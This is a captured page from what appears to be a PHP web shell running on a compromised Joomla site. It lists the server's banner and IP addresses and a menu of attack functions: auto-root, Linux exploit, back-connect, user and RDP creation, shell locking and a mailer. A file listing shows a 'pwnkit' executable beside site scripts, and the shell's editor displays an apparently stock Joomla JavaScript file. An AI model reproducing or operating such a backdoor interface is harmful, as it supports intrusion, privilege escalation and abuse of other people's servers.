Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_associations /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin-associations-default-es5...
605
B
-rw----r--
admin-associations-default-es5...
223
B
-rw----r--
admin-associations-default-es5...
179
B
-rw----r--
admin-associations-default.js
524
B
-rw----r--
admin-associations-default.min...
187
B
-rw----r--
admin-associations-default.min...
163
B
-rw----r--
admin-associations-modal-es5.j...
951
B
-rw----r--
admin-associations-modal-es5.m...
509
B
-rw----r--
admin-associations-modal-es5.m...
306
B
-rw----r--
admin-associations-modal.js
836
B
-rw----r--
admin-associations-modal.min.j...
456
B
-rw----r--
admin-associations-modal.min.j...
292
B
-rw----r--
associations-edit-es5.js
8.93
KB
-rw----r--
associations-edit-es5.min.js
2.55
KB
-rw----r--
associations-edit-es5.min.js.g...
1.1
KB
-rw----r--
associations-edit.js
8.43
KB
-rw----r--
associations-edit.min.js
2.46
KB
-rw----r--
associations-edit.min.js.gz
1.1
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
sidebyside.js
13.37
KB
-rw----r--
sidebyside.min.js
6.79
KB
-rw----r--
sidebyside.min.js.gz
1.63
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : associations-edit-es5.js
(function () { 'use strict'; /** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ Joomla = window.Joomla || {}; (function (Joomla, document) { Joomla.hideAssociation = function (formControl, languageCode) { var controlGroup = [].slice.call(document.querySelectorAll('#associations .control-group')); controlGroup.forEach(function (element) { // Current selected language. Hide it var el = element.querySelector('.control-label label'); if (el) { var attribute = el.getAttribute('for'); if (attribute.replace(new RegExp('_name$'), '') === formControl + "_associations_" + languageCode.replace('-', '_')) { element.classList.add('hidden'); } } }); }; Joomla.showAssociationMessage = function () { var controlGroup = [].slice.call(document.querySelectorAll('#associations .control-group')); var associations = document.getElementById('associations'); if (associations) { var html = document.createElement('joomla-alert'); html.innerText = Joomla.Text._('JGLOBAL_ASSOC_NOT_POSSIBLE'); associations.insertAdjacentElement('afterbegin', html); } controlGroup.forEach(function (element) { element.classList.add('hidden'); }); }; /** * Inject associations into other association fields * * This function is called whenever the Ajax request within propagateAssociation() completes * successfully. * Its purpose is to inject the associations which have been returned in the Ajax response into * the other association fields in the form. * It does this by invoking the various callback functions of those association fields (i.e. the * function which gets called whenever the administrator selects an association via the modal), * and passing the appropriate associated record details. * * @param result The response from the Ajax request. * Its structure is that generated by the JResponseJson class, * with the data field containing the associations * @param callbackFunctionPrefix The name of the callback function which the modal window uses * to set the selected item as the association, but minus the * language tag at the end * * @return boolean * * @since 3.9.0 */ Joomla.injectAssociations = function (result, callbackFunctionPrefix) { var functionName; if (result.success) { if (result.data.length !== 0) { [].slice.call(Object.keys(result.data)).forEach(function (lang) { functionName = callbackFunctionPrefix + lang.replace('-', '_'); window[functionName](result.data[lang].id, result.data[lang].title, result.data[lang].catid, null, null, lang); }); } if (result.message) { Joomla.renderMessages({ notice: [result.message] }); } } else { Joomla.renderMessages({ warning: [Joomla.Text._('JGLOBAL_ASSOCIATIONS_PROPAGATE_FAILED')] }); } }; /** * Propagate associations from this field into other association fields * * This function is called whenever an administrator populates an association (in the association * modal field) and then clicks on the Propagate button. * The purpose of this function is to find what other records (if any) are associated with the * one which the administrator has selected, and populate the other association fields with these * records. (Otherwise, if the administrator just clicks on Save without clicking on Propagate, * those other associations will be deleted). It does this by finding the id of the selected * associated record (from a hidden field) and makes an Ajax call to the server to find the other * associations, also passing up the language of the record currently being edited, as it should * be excluded. Once it has received from the server the other associations it calls * injectAssociations to inject them into the other association fields within the form. * * @param fieldPrefix The stem of the html ids for the elements comprising the * modal field * @param callbackFunctionPrefix The name of the callback function which the modal window uses * to set the selected item as the association, but minus the * language tag at the end * * @return boolean * * @since 3.9.0 */ Joomla.propagateAssociation = function (fieldPrefix, callbackFunctionPrefix) { // Find the id of the record which has been set as an association var assocId = document.getElementById(fieldPrefix + "_id").value; // Find the language of the record being edited var languageField = document.getElementById('jform_language'); var currentLang = languageField.options[languageField.selectedIndex].value; var data = { task: 'ajax.fetchAssociations', format: 'json', assocId: assocId, excludeLang: currentLang }; data[Joomla.getOptions('csrf.token', '')] = 1; var queryString = Object.keys(data).reduce(function (a, k) { a.push(k + "=" + encodeURIComponent(data[k])); return a; }, []).join('&'); var url = document.forms.adminForm.action + "&" + queryString; Joomla.request({ // Find the action url associated with the form - we need to add the token to this url: url, method: 'GET', data: JSON.stringify(data), headers: { 'Content-Type': 'application/json' }, onSuccess: function onSuccess(response) { Joomla.injectAssociations(JSON.parse(response), callbackFunctionPrefix); }, onError: function onError() { Joomla.renderMessages({ warning: [Joomla.Text._('JGLOBAL_ASSOCIATIONS_PROPAGATE_FAILED')] }); } }); return false; }; document.addEventListener('DOMContentLoaded', function () { var associationsEditOptions = Joomla.getOptions('system.associations.edit'); var formControl = associationsEditOptions.formControl || 'jform'; var formControlLanguage = document.getElementById(formControl + "_language"); // Hide the associations tab if needed if (parseInt(associationsEditOptions.hidden, 10) === 1) { Joomla.showAssociationMessage(); } else if (formControlLanguage) { // Hide only the associations for the current language Joomla.hideAssociation(formControl, formControlLanguage.value); } // When changing the language if (formControlLanguage) { formControlLanguage.addEventListener('change', function (_ref) { var target = _ref.target; // Remove message if any Joomla.removeMessages(); var existsAssociations = false; /** For each language, remove the associations, ie, * empty the associations fields and reset the buttons to Select/Create */ var controlGroup = [].slice.call(document.querySelectorAll('#associations .control-group')); controlGroup.forEach(function (element) { var attribute = element.querySelector('.control-label label').getAttribute('for'); var languageCode = attribute.replace('_name', '').replace('jform_associations_', ''); // Show the association fields element.classList.remove('hidden'); // Check if there was an association selected for this language if (!existsAssociations && document.getElementById(formControl + "_associations_" + languageCode + "_id").value !== '') { existsAssociations = true; } // Call the modal clear button var clear = document.getElementById(formControl + "_associations_" + languageCode + "_clear"); if (clear.onclick) { clear.onclick(); } else if (clear.click) { clear.click(); } }); // If associations existed, send a warning to the user if (existsAssociations) { Joomla.renderMessages({ warning: [Joomla.Text._('JGLOBAL_ASSOCIATIONS_RESET_WARNING')] }); } // If the selected language is All hide the fields and add a message var selectedLanguage = target.value; if (selectedLanguage === '*') { Joomla.showAssociationMessage(); } else { // Else show the associations fields/buttons and hide the current selected language Joomla.hideAssociation(formControl, selectedLanguage); } }); } }); })(Joomla, document); }());
Close